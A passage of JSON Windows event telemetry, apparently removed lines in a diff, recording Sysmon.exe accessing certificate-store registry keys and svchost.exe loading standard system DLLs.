"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 3980, - "process_name": "svchost.exe", - 
"process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - 
"registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software 
Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878710000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wldp.dll", - "image_path": "C:\\Windows\\System32\\wldp.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\System32\\cryptbase.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": 